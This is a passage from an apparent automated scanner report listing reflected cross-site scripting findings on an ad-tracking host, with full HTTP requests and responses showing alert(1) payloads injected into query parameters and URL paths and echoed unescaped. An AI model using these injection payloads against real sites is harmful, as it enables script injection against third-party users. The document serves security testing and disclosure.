Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206357

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/2063926244/x5427c01"><script>alert(1)</script>4430bdc2267/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.159. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [Section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1028646844@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbf9b'-alert(1)-'81c30b8b7db was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1028646844@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careersdbf9b'-alert(1)-'81c30b8b7db&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206357

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2119
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careersdbf9b'-alert(1)-'81c30b8b7db&Page=PositionPosting';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsec
...[SNIP]...

1.160. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [_RM_HTML_referer_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1028646844@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a1a8'-alert(1)-'959930afff9 was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1028646844@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers7a1a8'-alert(1)-'959930afff9&Section=Careers&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206357

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2119
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...

}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers7a1a8'-alert(1)-'959930afff9&Section=Careers&Page=PositionPosting';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section
...[SNIP]...

1.161. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [_RM_HTML_title_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1028646844@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebf19'-alert(1)-'0caea78f5e8 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1028646844@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20Yorkebf19'-alert(1)-'0caea78f5e8&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206357

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2175
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
*/
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20Yorkebf19'-alert(1)-'0caea78f5e8&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=
...[SNIP]...

1.162. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1028646844@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76078'-alert(1)-'c928e37433f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1028646844@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting&76078'-alert(1)-'c928e37433f=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206357

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2122
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
L_url_=http%3A//www.xaxis.com/uk/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers&Section=Careers&Page=PositionPosting&76078'-alert(1)-'c928e37433f=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.163. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [&_RM_HTML_url_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1047280635@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f65f'-alert(1)-'07ff354e24b was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1047280635@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work3f65f'-alert(1)-'07ff354e24b&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206265

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2020
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
rnal preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work3f65f'-alert(1)-'07ff354e24b&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?mig
...[SNIP]...

1.164. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1047280635@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d719b"><script>alert(1)</script>eac91876b3e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxisd719b"><script>alert(1)</script>eac91876b3e/1047280635@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206265

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxisd719b"><script>alert(1)</script>eac91876b3e/999287706/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.165. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1047280635@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b303"><script>alert(1)</script>e44c6d110af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1047280635@x549b303"><script>alert(1)</script>e44c6d110af?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206265

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/1700089811/x549b303"><script>alert(1)</script>e44c6d110af/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.166. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [Section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1047280635@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7f14'-alert(1)-'c10f5b57751 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1047280635@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Worke7f14'-alert(1)-'c10f5b57751 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206265

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2020
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
ge();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Worke7f14'-alert(1)-'c10f5b57751';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.167. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [_RM_HTML_referer_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1047280635@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2912'-alert(1)-'c7300bc2594 was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1047280635@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contactb2912'-alert(1)-'c7300bc2594&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206265

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:20 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2020
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
eTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contactb2912'-alert(1)-'c7300bc2594&Section=Work';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
...[SNIP]...

1.168. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [_RM_HTML_title_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1047280635@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 769cf'-alert(1)-'e448cdc90e5 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1047280635@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis769cf'-alert(1)-'e448cdc90e5&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206265

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2076
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
d does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis769cf'-alert(1)-'e448cdc90e5&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var x
...[SNIP]...

1.169. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1047280635@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21d3c'-alert(1)-'b2c4fcce2af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1047280635@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/work&_RM_HTML_title_=Work%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/contact&Section=Work&21d3c'-alert(1)-'b2c4fcce2af=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206265

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2023
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
e();
imageTR.src = stURL;
}

// Push to ZAP
